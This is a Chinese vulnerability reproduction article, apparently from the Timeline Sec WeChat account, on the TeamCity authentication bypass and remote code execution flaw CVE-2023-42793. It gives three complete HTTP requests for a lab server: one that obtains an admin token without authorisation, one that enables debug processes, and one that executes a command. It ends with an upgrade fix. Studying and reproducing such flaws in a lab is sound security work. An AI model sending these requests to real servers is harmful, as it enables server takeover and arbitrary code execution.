作者:niko@Timeline Sec
本文字数:2862
阅读时长:2~4min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介
TeamCity是一款功能强大的持续集成(Continue Integration)工具,包括服务器端和客户端,支持Java,.NET项目开发。
0x02 漏洞概述
漏洞编号:CVE-2023-42793
2023年Jetbrain官方披露CVE-2023-42793 TeamCity 认证绕过与远程代码执行漏洞,攻击者可构造恶意请求创建token,并利用相关功能执行任意代码,控制服务器。
0x03 影响版本
JetBrains TeamCity < 2023.5.3
0x04 环境搭建
https://www.jetbrains.com/zh-cn/teamcity/download/other.html
选择2023.05.2版本
下载后按照自行需求进行配置即可,此处环境搭建时一路确定
最后经过几分钟的初始化后,出现如下登录界面则表示环境搭建成功
0x05 漏洞复现
越权获取token
POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: 192.168.31.20:8111
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Origin: http://localhost:8111
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost:8111/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
携带token去开启调试模式
POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=true HTTP/1.1
Host: 192.168.31.20:8111
Content-Length: 0
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Origin: http://localhost:8111
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost:8111/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.WGxjY2lvWjk1enk2TlV0YVdzWExvWnE1ZmhN.OWFlN2ZhNmYtYTBjYy00YTkzLTgwNjQtYjM3YTE4OGY4YWM0
访问/app/rest/debug/processes,命令执行
POST /app/rest/debug/processes?exePath=whoami HTTP/1.1
Host: 192.168.31.20:8111
Content-Length: 0
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Origin: http://localhost:8111
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost:8111/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.WGxjY2lvWjk1enk2TlV0YVdzWExvWnE1ZmhN.OWFlN2ZhNmYtYTBjYy00YTkzLTgwNjQtYjM3YTE4OGY4YWM0
0x06 修复方式
升级 teamcity 至官方最新版本。
历史漏洞
CVE-2024-23917-前台-POC已公开
CVE-2024-27198-前台-POC已公开
CVE-2024-27199-前台-POC已公开
CVE-2023-42793-前台-POC已公开
原文始发于微信公众号(Timeline Sec):CVE-2023-42793:TeamCity认证绕过RCE漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论